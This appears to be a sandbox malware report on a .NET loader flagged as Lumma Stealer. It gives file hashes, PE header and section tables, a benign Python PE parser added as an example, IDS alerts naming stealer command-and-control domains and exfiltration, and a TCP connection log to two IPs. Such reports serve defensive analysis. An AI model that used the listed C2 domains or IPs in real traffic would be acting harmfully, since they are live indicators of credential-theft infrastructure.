SHA-256: 29C961EE9F77637C881D9193C6499A84B1320372F3EDC9B8337AB03FB8B8F589
SHA-512: 10767A9B988843D5ED27C6509CE8801A2A604C5298CD602B4D26E1AB0957E837E1531F60DC37B3EC1DE7EE0A1378E2250D3D737E58926F4D4B0E7CD1FB8275D9
Malicious: true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 63%
                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........b.....................A..................{w....................................................Rich...........................PE..L.....mg...........!.........h......D........................................ ............@.............................|...<...P...............................8*..\...............................x...@...............T............................text...H........................... ..`.rdata...e.......f..................@..@.data...............................@....reloc..8*.......,..................@..B................................................................................................................................................................................................................................................................................................................................
File type: PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit): 7.109963399573792
TrID:
• Win32 Executable (generic) Net Framework (10011505/4) 49.83%
• Win32 Executable (generic) a (10002005/4) 49.78%
• Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
• Generic Win/DOS Executable (2004/3) 0.01%
• DOS Executable Generic (2002/1) 0.01%
File name: Loader.exe
File size: 662'016 bytes
MD5: 2ec18b257662dd107ae84263ecd2e5c1
SHA1: ce2efa8394c35b8da16428b10ece4a856c53dd1f
SHA256: 539f0617a85a7a0773cf9e36d803c1a8ddf5c69dc003c80c1f3afac147b47554
SHA512: 6cf6f83dbaca7f218f6add89de942bc6a8d83fef9ccbbb3f3ef3c03bba4233a25b18f1bc392da27b37b88bb649fecc7c05ed28a9dcf849de957103f03fa63342
SSDEEP: 12288:xI6tpbrZqB16QBXv9trocVyiBFAMyhZVUEz4Pjt/ax7OA2:xIMH6JjocVy+yhZVUEz4PAx7O
TLSH: 74E44A6F977BF209F04A0070A59A367B5DF4EEA5E103C8F206C4E9676066861DFECD12
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....mg..............0.............r@... ...@....@.. ....................................@................................
Icon Hash: 00928e8e8686b000
Entrypoint: 0x404072
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows cui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp: 0x676DD9C0 [Thu Dec 26 22:33:36 2024 UTC]
TLS Callbacks: (none)
CLR (.Net) Version: (not reported)
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: f34d5f2d4577ed6d9ceec516c1f5a744
Instruction (disassembly at the entrypoint):
jmp dword ptr [00402000h]
jnl 00007FC2C0EA7522h
cmp cl, dl
The first instruction is the entire native entrypoint: it jumps through the IAT slot at 0x402000 (image base 0x400000 + IAT RVA 0x2000), which holds the only import, mscoree.dll!_CorExeMain, handing control to the CLR. Because that jmp is unconditional, the bytes decoded after it are never reached by fall-through; they are data the disassembler kept decoding, not code.
Name                                | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT         | 0x0             | 0x0          | -
IMAGE_DIRECTORY_ENTRY_IMPORT         | 0x4020          | 0x4f         | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE       | 0xa4000         | 0x664        | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION      | 0x0             | 0x0          | -
IMAGE_DIRECTORY_ENTRY_SECURITY       | 0x0             | 0x0          | -
IMAGE_DIRECTORY_ENTRY_BASERELOC      | 0xa6000         | 0xc          | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG          | 0x0             | 0x0          | -
IMAGE_DIRECTORY_ENTRY_COPYRIGHT      | 0x0             | 0x0          | -
IMAGE_DIRECTORY_ENTRY_GLOBALPTR      | 0x0             | 0x0          | -
IMAGE_DIRECTORY_ENTRY_TLS            | 0x0             | 0x0          | -
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG    | 0x0             | 0x0          | -
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT   | 0x0             | 0x0          | -
IMAGE_DIRECTORY_ENTRY_IAT            | 0x2000          | 0x8          | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT   | 0x0             | 0x0          | -
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008          | 0x48         | .text
IMAGE_DIRECTORY_ENTRY_RESERVED       | 0x0             | 0x0          | -
Name   | Virtual Address | Virtual Size | Raw Size | MD5                              | Xored PE | ZLIB Complexity     | File Type | Entropy             | Characteristics
.text  | 0x2000          | 0xa0c78      | 0xa0e00  | 163959917283545171c710f544f483d0 | False    | 0.4664432789432789  | data      | 7.116320721076053   | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc  | 0xa4000         | 0x664        | 0x800    | 02908315fb791e6119b5131b5b26370c | False    | 0.35302734375       | data      | 3.6099202773203682  | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xa6000         | 0xc          | 0x200    | b8621a767d2dd3d37ce617bafd19944b | False    | 0.044921875         | data      | 0.08153941234324169 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name        | RVA     | Size  | Type                                                                                | Language | Country | ZLIB Complexity
RT_VERSION  | 0xa4090 | 0x3d4 | data                                                                                | -        | -       | 0.42551020408163265
RT_MANIFEST | 0xa4474 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators   | -        | -       | 0.5489795918367347
DLL         | Import
mscoree.dll | _CorExeMain
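The data-directory, section and entrypoint fields above are read straight out of the PE headers, and a few of them carry the whole static story of this sample: a non-empty COM_DESCRIPTOR (CLR header) marks a managed assembly, a single IAT slot plus an `FF 25` jump at the entrypoint is the stock native-to-CLR stub, and a .text section at entropy 7.1 is far above what compiled CIL normally produces, which is consistent with the large encrypted array initializations flagged elsewhere in the report. The following is an added example, not code from the report or from Joe Sandbox: a stdlib-only Python parser that reproduces those fields (directory RVA to section mapping, per-section Shannon entropy, the CLR-header test, decoding of the `jmp dword ptr [IAT]` stub) and runs against a constructed PE32 image that mimics this sample's layout. The constructed image, its filler bytes, and the `build_sample_pe`, `parse_pe` and `managed_entry_stub` names are assumptions for illustration, not bytes taken from Loader.exe.

```python
"""Stdlib-only PE32 inspection: data directories mapped to sections, per-section entropy and
the .NET entry stub. The PE image it parses is constructed below, not the real Loader.exe."""
import math
import random
import struct

DIRECTORY_NAMES = ["EXPORT", "IMPORT", "RESOURCE", "EXCEPTION", "SECURITY", "BASERELOC",
                   "DEBUG", "COPYRIGHT", "GLOBALPTR", "TLS", "LOAD_CONFIG", "BOUND_IMPORT",
                   "IAT", "DELAY_IMPORT", "COM_DESCRIPTOR", "RESERVED"]
IMAGE_SCN_MEM_EXECUTE = 0x20000000


def shannon_entropy(buf: bytes) -> float:
    """Bits per byte: 8.0 is uniformly random; packed or encrypted blobs sit above ~7."""
    n = len(buf)
    if n == 0:
        return 0.0
    counts = [0] * 256
    for b in buf:
        counts[b] += 1
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def section_for_rva(sections: list, rva: int):
    for s in sections:
        if s["va"] <= rva < s["va"] + max(s["vsize"], s["rawsize"]):
            return s["name"]
    return None


def parse_pe(data: bytes) -> dict:
    """DOS header -> PE signature -> COFF header -> optional header -> section table."""
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[:2] != b"MZ" or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    coff = e_lfanew + 4
    nsections, opt_size = struct.unpack_from("<H", data, coff + 2)[0], struct.unpack_from("<H", data, coff + 16)[0]
    opt = coff + 20
    if struct.unpack_from("<H", data, opt)[0] != 0x10B:
        raise ValueError("only PE32 (magic 0x10B) handled here")
    entry_rva, image_base = struct.unpack_from("<I", data, opt + 16)[0], struct.unpack_from("<I", data, opt + 28)[0]
    ndirs = struct.unpack_from("<I", data, opt + 92)[0]
    sections = []
    for i in range(nsections):                       # 40-byte IMAGE_SECTION_HEADER entries
        off = opt + opt_size + 40 * i
        vsize, va, rawsize, rawptr = struct.unpack_from("<4I", data, off + 8)
        chars = struct.unpack_from("<I", data, off + 36)[0]
        sections.append({"name": data[off:off + 8].rstrip(b"\0").decode("ascii", "replace"),
                         "va": va, "vsize": vsize, "rawsize": rawsize, "rawptr": rawptr,
                         "executable": bool(chars & IMAGE_SCN_MEM_EXECUTE),
                         "entropy": round(shannon_entropy(data[rawptr:rawptr + rawsize]), 3)})
    dirs = {}
    for i in range(min(ndirs, 16)):                  # IMAGE_DATA_DIRECTORY: (RVA, size) pairs
        rva, size = struct.unpack_from("<II", data, opt + 96 + 8 * i)
        dirs[DIRECTORY_NAMES[i]] = (rva, size, section_for_rva(sections, rva) if rva else None)
    # A non-empty CLR header (COM_DESCRIPTOR) is what makes the file a managed assembly.
    return {"entrypoint": entry_rva, "image_base": image_base, "sections": sections,
            "directories": dirs, "is_dotnet": dirs.get("COM_DESCRIPTOR", (0,))[0] != 0}


def managed_entry_stub(data: bytes, info: dict):
    """Decode `FF 25 imm32` (jmp dword ptr [imm32]) at the entrypoint; via_iat is True when the
    dereferenced slot lies in the IAT, i.e. the stock stub that jumps to mscoree!_CorExeMain."""
    name = section_for_rva(info["sections"], info["entrypoint"])
    if name is None:
        return None
    sec = next(s for s in info["sections"] if s["name"] == name)
    off = info["entrypoint"] - sec["va"] + sec["rawptr"]
    if data[off:off + 2] != b"\xff\x25":
        return None
    target = struct.unpack_from("<I", data, off + 2)[0]
    iat_rva, iat_size, _ = info["directories"]["IAT"]
    return {"target": target, "via_iat": iat_rva <= target - info["image_base"] < iat_rva + iat_size}


def build_sample_pe() -> bytes:
    """Constructed image mimicking the report's layout (IAT at RVA 0x2000, CLR header at 0x2008,
    `jmp dword ptr [0x402000]` entry stub, high-entropy .text); NOT the bytes of Loader.exe."""
    hdr = bytearray(0x200)
    hdr[:2], hdr[0x40:0x44] = b"MZ", b"PE\0\0"
    struct.pack_into("<I", hdr, 0x3C, 0x40)                                           # e_lfanew
    struct.pack_into("<HHIIIHH", hdr, 0x44, 0x14C, 2, 0x676DD9C0, 0, 0, 224, 0x0102)  # COFF header
    opt = 0x58                                                                        # IMAGE_OPTIONAL_HEADER32
    struct.pack_into("<HBB9I6H4I2H6I", hdr, opt, 0x10B, 0x30, 0, 0x200, 0x200, 0, 0x2050, 0x2000,
                     0x4000, 0x400000, 0x2000, 0x200, 4, 0, 0, 0, 4, 0, 0, 0x6000, 0x200, 0, 3, 0x8540,
                     0x100000, 0x1000, 0x100000, 0x1000, 0, 16)
    for idx, rva, size in ((2, 0x4000, 0x40), (12, 0x2000, 8), (14, 0x2008, 0x48)):  # RESOURCE, IAT, CLR
        struct.pack_into("<II", hdr, opt + 96 + 8 * idx, rva, size)
    for i, (name, va, ptr, chars) in enumerate(((b".text", 0x2000, 0x200, 0x60000020),
                                                (b".rsrc", 0x4000, 0x400, 0x40000040))):
        struct.pack_into("<8s6IHHI", hdr, opt + 224 + 40 * i, name, 0x200, va, 0x200, ptr, 0, 0, 0, 0, chars)
    text = bytearray(0x200)
    struct.pack_into("<I", text, 0, 0x2060)                      # IAT slot (import thunk)
    struct.pack_into("<IHH", text, 8, 0x48, 2, 5)                # CLR header: cb, runtime 2.5
    text[0x50:0x56] = b"\xff\x25" + struct.pack("<I", 0x402000)  # jmp dword ptr [0x402000]
    rng = random.Random(7)                                       # deterministic stand-in for a packed blob
    text[0x56:] = bytes(rng.getrandbits(8) for _ in range(0x200 - 0x56))
    rsrc = bytearray(0x200)
    rsrc[:11] = b"<assembly/>"                                   # low-entropy resource section
    return bytes(hdr + text + rsrc)
```

Calling `parse_pe(build_sample_pe())` yields a COM_DESCRIPTOR entry of (0x2008, 0x48, ".text"), an IAT entry of (0x2000, 8, ".text") and an executable .text section whose entropy is well above the .rsrc section's, and `managed_entry_stub` resolves the stub to 0x402000 inside the IAT, the same shape as the directory and section tables above. Point `parse_pe` at real file bytes to get the same view of an arbitrary PE32; the entropy column is the quickest single indicator that a managed .text section carries something other than plain CIL.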
Timestamp                        | SID     | Signature                                                                        | Severity | Source IP   | Source Port | Dest IP        | Dest Port | Protocol
2024-12-28T22:05:02.286296+0100  | 2058584 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (prisonyfork .buzz)   | 1        | 192.168.2.5 | 54097       | 1.1.1.1        | 53        | UDP
2024-12-28T22:05:02.454948+0100  | 2058586 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rebuildeso .buzz)    | 1        | 192.168.2.5 | 51953       | 1.1.1.1        | 53        | UDP
2024-12-28T22:05:02.599824+0100  | 2058588 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (scentniej .buzz)     | 1        | 192.168.2.5 | 65086       | 1.1.1.1        | 53        | UDP
2024-12-28T22:05:02.740771+0100  | 2058580 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (inherineau .buzz)    | 1        | 192.168.2.5 | 50901       | 1.1.1.1        | 53        | UDP
2024-12-28T22:05:02.884238+0100  | 2058590 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (screwamusresz .buzz) | 1        | 192.168.2.5 | 65025       | 1.1.1.1        | 53        | UDP
2024-12-28T22:05:03.048763+0100  | 2058572 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (appliacnesot .buzz)  | 1        | 192.168.2.5 | 54520       | 1.1.1.1        | 53        | UDP
2024-12-28T22:05:03.188045+0100  | 2058576 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (cashfuzysao .buzz)   | 1        | 192.168.2.5 | 52993       | 1.1.1.1        | 53        | UDP
2024-12-28T22:05:03.427192+0100  | 2058578 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (hummskitnj .buzz)    | 1        | 192.168.2.5 | 57564       | 1.1.1.1        | 53        | UDP
2024-12-28T22:05:05.268137+0100  | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update                              | 3        | 192.168.2.5 | 49704       | 23.55.153.106  | 443       | TCP
2024-12-28T22:05:06.050526+0100  | 2858666 | ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup                                 | 1        | 192.168.2.5 | 49704       | 23.55.153.106  | 443       | TCP
2024-12-28T22:05:07.752125+0100  | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update                              | 3        | 192.168.2.5 | 49705       | 172.67.157.254 | 443       | TCP
2024-12-28T22:05:08.524544+0100  | 2049836 | ET MALWARE Lumma Stealer Related Activity                                              | 1        | 192.168.2.5 | 49705       | 172.67.157.254 | 443       | TCP
2024-12-28T22:05:08.524544+0100  | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin                                              | 1        | 192.168.2.5 | 49705       | 172.67.157.254 | 443       | TCP
2024-12-28T22:05:09.767020+0100  | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update                              | 3        | 192.168.2.5 | 49706       | 172.67.157.254 | 443       | TCP
2024-12-28T22:05:10.540001+0100  | 2049812 | ET MALWARE Lumma Stealer Related Activity M2                                           | 1        | 192.168.2.5 | 49706       | 172.67.157.254 | 443       | TCP
2024-12-28T22:05:10.540001+0100  | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin                                              | 1        | 192.168.2.5 | 49706       | 172.67.157.254 | 443       | TCP
2024-12-28T22:05:12.146215+0100  | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update                              | 3        | 192.168.2.5 | 49707       | 172.67.157.254 | 443       | TCP
2024-12-28T22:05:14.544670+0100  | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update                              | 3        | 192.168.2.5 | 49708       | 172.67.157.254 | 443       | TCP
2024-12-28T22:05:16.862818+0100  | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update                              | 3        | 192.168.2.5 | 49709       | 172.67.157.254 | 443       | TCP
2024-12-28T22:05:19.402133+0100  | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update                              | 3        | 192.168.2.5 | 49710       | 172.67.157.254 | 443       | TCP
2024-12-28T22:05:20.182376+0100  | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration                                  | 1        | 192.168.2.5 | 49710       | 172.67.157.254 | 443       | TCP
2024-12-28T22:05:21.574600+0100  | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update                              | 3        | 192.168.2.5 | 49713       | 172.67.157.254 | 443       | TCP
2024-12-28T22:05:23.705985+0100  | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update                              | 3        | 192.168.2.5 | 49716       | 172.67.157.254 | 443       | TCP
2024-12-28T22:05:24.619897+0100  | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin                                              | 1        | 192.168.2.5 | 49716       | 172.67.157.254 | 443       | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 28, 2024 22:05:03.782820940 CET | 49704 | 443 | 192.168.2.5 | 23.55.153.106
Dec 28, 2024 22:05:03.782870054 CET | 443 | 49704 | 23.55.153.106 | 192.168.2.5
Dec 28, 2024 22:05:03.782933950 CET | 49704 | 443 | 192.168.2.5 | 23.55.153.106
Dec 28, 2024 22:05:03.784315109 CET | 49704 | 443 | 192.168.2.5 | 23.55.153.106
Dec 28, 2024 22:05:03.784327984 CET | 443 | 49704 | 23.55.153.106 | 192.168.2.5
Dec 28, 2024 22:05:05.268058062 CET | 443 | 49704 | 23.55.153.106 | 192.168.2.5
Dec 28, 2024 22:05:05.268136978 CET | 49704 | 443 | 192.168.2.5 | 23.55.153.106
Dec 28, 2024 22:05:05.271755934 CET | 49704 | 443 | 192.168.2.5 | 23.55.153.106
Dec 28, 2024 22:05:05.271765947 CET | 443 | 49704 | 23.55.153.106 | 192.168.2.5
Dec 28, 2024 22:05:05.271979094 CET | 443 | 49704 | 23.55.153.106 | 192.168.2.5
Dec 28, 2024 22:05:05.316437960 CET | 49704 | 443 | 192.168.2.5 | 23.55.153.106
Dec 28, 2024 22:05:05.335741997 CET | 49704 | 443 | 192.168.2.5 | 23.55.153.106
Dec 28, 2024 22:05:05.379373074 CET | 443 | 49704 | 23.55.153.106 | 192.168.2.5
Dec 28, 2024 22:05:06.050564051 CET | 443 | 49704 | 23.55.153.106 | 192.168.2.5
Dec 28, 2024 22:05:06.050584078 CET | 443 | 49704 | 23.55.153.106 | 192.168.2.5
Dec 28, 2024 22:05:06.050610065 CET | 443 | 49704 | 23.55.153.106 | 192.168.2.5
Dec 28, 2024 22:05:06.050626040 CET | 443 | 49704 | 23.55.153.106 | 192.168.2.5
Dec 28, 2024 22:05:06.050645113 CET | 443 | 49704 | 23.55.153.106 | 192.168.2.5
Dec 28, 2024 22:05:06.050667048 CET | 49704 | 443 | 192.168.2.5 | 23.55.153.106
Dec 28, 2024 22:05:06.050678968 CET | 443 | 49704 | 23.55.153.106 | 192.168.2.5
Dec 28, 2024 22:05:06.050705910 CET | 49704 | 443 | 192.168.2.5 | 23.55.153.106
Dec 28, 2024 22:05:06.050730944 CET | 49704 | 443 | 192.168.2.5 | 23.55.153.106
Dec 28, 2024 22:05:06.247848988 CET | 443 | 49704 | 23.55.153.106 | 192.168.2.5
Dec 28, 2024 22:05:06.247893095 CET | 443 | 49704 | 23.55.153.106 | 192.168.2.5
Dec 28, 2024 22:05:06.247950077 CET | 49704 | 443 | 192.168.2.5 | 23.55.153.106
Dec 28, 2024 22:05:06.247961044 CET | 443 | 49704 | 23.55.153.106 | 192.168.2.5
Dec 28, 2024 22:05:06.248004913 CET | 49704 | 443 | 192.168.2.5 | 23.55.153.106
Dec 28, 2024 22:05:06.278573990 CET | 443 | 49704 | 23.55.153.106 | 192.168.2.5
Dec 28, 2024 22:05:06.278605938 CET | 443 | 49704 | 23.55.153.106 | 192.168.2.5
Dec 28, 2024 22:05:06.278660059 CET | 49704 | 443 | 192.168.2.5 | 23.55.153.106
Dec 28, 2024 22:05:06.278664112 CET | 443 | 49704 | 23.55.153.106 | 192.168.2.5
Dec 28, 2024 22:05:06.278678894 CET | 443 | 49704 | 23.55.153.106 | 192.168.2.5
Dec 28, 2024 22:05:06.278693914 CET | 49704 | 443 | 192.168.2.5 | 23.55.153.106
Dec 28, 2024 22:05:06.278734922 CET | 49704 | 443 | 192.168.2.5 | 23.55.153.106
Dec 28, 2024 22:05:06.280495882 CET | 49704 | 443 | 192.168.2.5 | 23.55.153.106
Dec 28, 2024 22:05:06.280514956 CET | 443 | 49704 | 23.55.153.106 | 192.168.2.5
Dec 28, 2024 22:05:06.280524015 CET | 49704 | 443 | 192.168.2.5 | 23.55.153.106
Dec 28, 2024 22:05:06.280529976 CET | 443 | 49704 | 23.55.153.106 | 192.168.2.5
Dec 28, 2024 22:05:06.487510920 CET | 49705 | 443 | 192.168.2.5 | 172.67.157.254
Dec 28, 2024 22:05:06.487603903 CET | 443 | 49705 | 172.67.157.254 | 192.168.2.5
Dec 28, 2024 22:05:06.487683058 CET | 49705 | 443 | 192.168.2.5 | 172.67.157.254
Dec 28, 2024 22:05:06.488056898 CET | 49705 | 443 | 192.168.2.5 | 172.67.157.254
Dec 28, 2024 22:05:06.488095045 CET | 443 | 49705 | 172.67.157.254 | 192.168.2.5
Dec 28, 2024 22:05:07.752032995 CET | 443 | 49705 | 172.67.157.254 | 192.168.2.5
Dec 28, 2024 22:05:07.752125025 CET | 49705 | 443 | 192.168.2.5 | 172.67.157.254
Dec 28, 2024 22:05:07.754971981 CET | 49705 | 443 | 192.168.2.5 | 172.67.157.254
Dec 28, 2024 22:05:07.754995108 CET | 443 | 49705 | 172.67.157.254 | 192.168.2.5
Dec 28, 2024 22:05:07.755263090 CET | 443 | 49705 | 172.67.157.254 | 192.168.2.5
Dec 28, 2024 22:05:07.756400108 CET | 49705 | 443 | 192.168.2.5 | 172.67.157.254
Dec 28, 2024 22:05:07.756438971 CET | 49705 | 443 | 192.168.2.5 | 172.67.157.254
Dec 28, 2024 22:05:07.756489038 CET | 443 | 49705 | 172.67.157.254 | 192.168.2.5
Dec 28, 2024 22:05:08.524539948 CET | 443 | 49705 | 172.67.157.254 | 192.168.2.5
Dec 28, 2024 22:05:08.524632931 CET | 443 | 49705 | 172.67.157.254 | 192.168.2.5
Dec 28, 2024 22:05:08.524692059 CET | 49705 | 443 | 192.168.2.5 | 172.67.157.254
Dec 28, 2024 22:05:08.526916981 CET | 49705 | 443 | 192.168.2.5 | 172.67.157.254
Dec 28, 2024 22:05:08.526969910 CET | 443 | 49705 | 172.67.157.254 | 192.168.2.5
Dec 28, 2024 22:05:08.527002096 CET | 49705 | 443 | 192.168.2.5 | 172.67.157.254
Dec 28, 2024 22:05:08.527015924 CET | 443 | 49705 | 172.67.157.254 | 192.168.2.5
Dec 28, 2024 22:05:08.552859068 CET | 49706 | 443 | 192.168.2.5 | 172.67.157.254
Dec 28, 2024 22:05:08.552896023 CET | 443 | 49706 | 172.67.157.254 | 192.168.2.5
Dec 28, 2024 22:05:08.552970886 CET | 49706 | 443 | 192.168.2.5 | 172.67.157.254
Dec 28, 2024 22:05:08.553237915 CET | 49706 | 443 | 192.168.2.5 | 172.67.157.254
Dec 28, 2024 22:05:08.553247929 CET | 443 | 49706 | 172.67.157.254 | 192.168.2.5
Dec 28, 2024 22:05:09.766911030 CET | 443 | 49706 | 172.67.157.254 | 192.168.2.5
Dec 28, 2024 22:05:09.767019987 CET | 49706 | 443 | 192.168.2.5 | 172.67.157.254
Dec 28, 2024 22:05:09.768301010 CET | 49706 | 443 | 192.168.2.5 | 172.67.157.254
Dec 28, 2024 22:05:09.768309116 CET | 443 | 49706 | 172.67.157.254 | 192.168.2.5
Dec 28, 2024 22:05:09.768549919 CET | 443 | 49706 | 172.67.157.254 | 192.168.2.5
Dec 28, 2024 22:05:09.769783974 CET | 49706 | 443 | 192.168.2.5 | 172.67.157.254
Dec 28, 2024 22:05:09.769809008 CET | 49706 | 443 | 192.168.2.5 | 172.67.157.254
Dec 28, 2024 22:05:09.769845963 CET | 443 | 49706 | 172.67.157.254 | 192.168.2.5
Dec 28, 2024 22:05:10.540013075 CET | 443 | 49706 | 172.67.157.254 | 192.168.2.5
Dec 28, 2024 22:05:10.540059090 CET | 443 | 49706 | 172.67.157.254 | 192.168.2.5
Dec 28, 2024 22:05:10.540105104 CET | 443 | 49706 | 172.67.157.254 | 192.168.2.5
Dec 28, 2024 22:05:10.540133953 CET | 443 | 49706 | 172.67.157.254 | 192.168.2.5
Dec 28, 2024 22:05:10.540178061 CET | 443 | 49706 | 172.67.157.254 | 192.168.2.5
Dec 28, 2024 22:05:10.540225029 CET | 49706 | 443 | 192.168.2.5 | 172.67.157.254
Dec 28, 2024 22:05:10.540225029 CET | 49706 | 443 | 192.168.2.5 | 172.67.157.254
Dec 28, 2024 22:05:10.540261984 CET | 443 | 49706 | 172.67.157.254 | 192.168.2.5
Dec 28, 2024 22:05:10.540308952 CET | 49706 | 443 | 192.168.2.5 | 172.67.157.254
Dec 28, 2024 22:05:10.548290968 CET | 443 | 49706 | 172.67.157.254 | 192.168.2.5
Dec 28, 2024 22:05:10.556515932 CET | 443 | 49706 | 172.67.157.254 | 192.168.2.5
Dec 28, 2024 22:05:10.556579113 CET | 443 | 49706 | 172.67.157.254 | 192.168.2.5
Dec 28, 2024 22:05:10.556587934 CET | 49706 | 443 | 192.168.2.5 | 172.67.157.254
Dec 28, 2024 22:05:10.556607008 CET | 443 | 49706 | 172.67.157.254 | 192.168.2.5
Dec 28, 2024 22:05:10.556663036 CET | 49706 | 443 | 192.168.2.5 | 172.67.157.254
Dec 28, 2024 22:05:10.564948082 CET | 443 | 49706 | 172.67.157.254 | 192.168.2.5
Dec 28, 2024 22:05:10.613300085 CET | 49706 | 443 | 192.168.2.5 | 172.67.157.254
Dec 28, 2024 22:05:10.659634113 CET | 443 | 49706 | 172.67.157.254 | 192.168.2.5
Dec 28, 2024 22:05:10.707046986 CET | 49706 | 443 | 192.168.2.5 | 172.67.157.254
Dec 28, 2024 22:05:10.707061052 CET | 443 | 49706 | 172.67.157.254 | 192.168.2.5
Dec 28, 2024 22:05:10.735547066 CET | 443 | 49706 | 172.67.157.254 | 192.168.2.5
Dec 28, 2024 22:05:10.735613108 CET | 49706 | 443 | 192.168.2.5 | 172.67.157.254
Dec 28, 2024 22:05:10.735620975 CET | 443 | 49706 | 172.67.157.254 | 192.168.2.5
Dec 28, 2024 22:05:10.735672951 CET | 443 | 49706 | 172.67.157.254 | 192.168.2.5
Dec 28, 2024 22:05:10.735723972 CET | 49706 | 443 | 192.168.2.5 | 172.67.157.254
Dec 28, 2024 22:05:10.735835075 CET | 49706 | 443 | 192.168.2.5 | 172.67.157.254
Dec 28, 2024 22:05:10.735847950 CET | 443 | 49706 | 172.67.157.254 | 192.168.2.5
Dec 28, 2024 22:05:10.735863924 CET | 49706 | 443 | 192.168.2.5 | 172.67.157.254
Dec 28, 2024 22:05:10.735867977 CET | 443 | 49706 | 172.67.157.254 | 192.168.2.5
Dec 28, 2024 22:05:10.887257099 CET | 49707 | 443 | 192.168.2.5 | 172.67.157.254
Dec 28, 2024 22:05:10.887304068 CET | 443 | 49707 | 172.67.157.254 | 192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:10.887383938 CET49707443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:10.887825966 CET49707443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:10.887845039 CET44349707172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:12.146136045 CET44349707172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:12.146214962 CET49707443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:12.147571087 CET49707443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:12.147602081 CET44349707172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:12.147846937 CET44349707172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:12.149066925 CET49707443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:12.149209023 CET49707443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:12.149252892 CET44349707172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:13.191535950 CET44349707172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:13.191626072 CET44349707172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:13.191689968 CET49707443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:13.191910982 CET49707443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:13.191934109 CET44349707172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:13.330807924 CET49708443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:13.330873966 CET44349708172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:13.330962896 CET49708443192.168.2.5172.67.157.254
